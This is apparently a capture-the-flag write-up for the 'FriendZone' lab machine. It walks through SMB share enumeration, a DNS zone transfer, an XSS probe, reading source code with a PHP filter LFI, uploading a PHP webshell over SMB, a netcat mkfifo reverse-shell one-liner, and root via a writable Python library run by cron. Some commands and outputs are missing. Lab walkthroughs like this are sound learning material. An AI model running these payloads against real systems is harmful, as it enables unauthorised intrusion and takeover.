
1.nmap scan

the machine opnes ftp,ssh,smbd and ssl the port 80 just a picture
SMB shares 445/139

first use smbmap to list shares and permissions

smbmap -H
it can also get using smbclient
smbclient -N -L //

-N represent null session (or no auth) and -L to list

the comment of Files says that its /etc/Files
so we can use nmap to verify

nmap --script smb-enum-shares.nse -p445
it will give me the path on target to the share

The Development share is empty:


The general share has a single file,we can get it and have a look

its a cred

TCP 80

the site give us a new domain
we now use dirsearch to find some paths

the robots.txt just a phrase

and the wordpress is empty dir

https 443

first use the comman name get via nmap to visit
the site just has a picture

and if we view page source,we can get another path

the js/js path has a encode string,so we can try to decode it

it also have a hint

i temporarily don’t know what’s the meaning of it


TCP is only used in DNS when the response size is greater than 512 bytes. Typically this is associated with Zone Transfers, where the server give all the information it has for a domain. There’s a few things I could try to enumerate DNS, but the fact that the host is listening on TCP 53 suggests the first thing I should try is a Zone Transfer.
I’ll do that with dig. I’ll start with friendzone.htb, and get nothing:

Since I have a domain name in the TLS certificate, I’ll try that:

I can also try the domain I got on the first webpage, “”:

I’ll update my hosts file for each of these:
use the creds we get ,and we can in visit /dashboard.php ,and we can find something else we add the `?image_id=a.jpg&pagename=timestamp` to the path,and we can get another page use dirsearch to search the path it's has a image dir and has two pics and it's also has a page called timestamp.php

2.get webshell access

Find LFI

because the pic is load by the full path,we can try to find load file inclusion
The image_id, such as a.jpg is a full file name. I’ll try giving it a php page, which it would load if that file is being shown using include in php. Unfortunately, it just shows a broken image:

Looking at the source, I see <img src='images/timestamp.php'>. I could play with XSS here, and see if I can get it to load a script. For example, if I set image_id=' onerror='javascript: alert("XXS HERE");, I get a pop-up:

The source explains it: <img src='images/' onerror='javascript: alert("XXS HERE");'>
Since the given example case is timestamp, and there’s a timestamp.php in the same directory, I can assume that this is likely doing a include($_GET["pagename"] . ".php"). I can test this by having it point to other php pages.
Visiting returns: Wrong!
and we change to pagename to login can also see the same word

read PHP resource

I can use this LFI to read source code for these pages using php filters. If I visit pagename=php://filter/convert.base64-encode/resource=dashboard, I can see a long base64 string on the page:

decoding it,and we can find something

we can do the same thing to read upload pagename=php://filter/convert.base64-encode/resource=../uploads/upload


I want to use this LFI to include a webshell so I can run commands. I’ll use my smb access to drop a simple php command shell into the Development share, which nmap told me was /etc/Development.

and upload it to the machine

smbclient -N // -c 'put cmd.php zyz.php'
Now, on visiting ``, I get output:

I’ll use my go to from the Reverse Shell Cheat Sheet and visit: /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>%261|nc 4444 >/tmp/f (remembering to encode the & as %26):

After a shell upgrade (python -c 'import pty;pty.spawn("bash")', ctrl-z, stty raw -echo;fg, reset, enter “screen” for terminal type if asked), I’ve got a full shell. And I can get user.txt.
In the /var/www/ directory, there’s folders for all the different sites, as well as an sql conf file:

use the password to su friend

3.get root access

search around the machine, there has a py script in /opt/server_admin

find /tmp can write to upload our pspy

our machine:python3 -m http.server 80
target machine:wget
               chmod +x pspy32s

and we can find that root was running this script every two minutes:

via,we find a file that friend can write

we append the following scripts to the end of it

and finally we get the root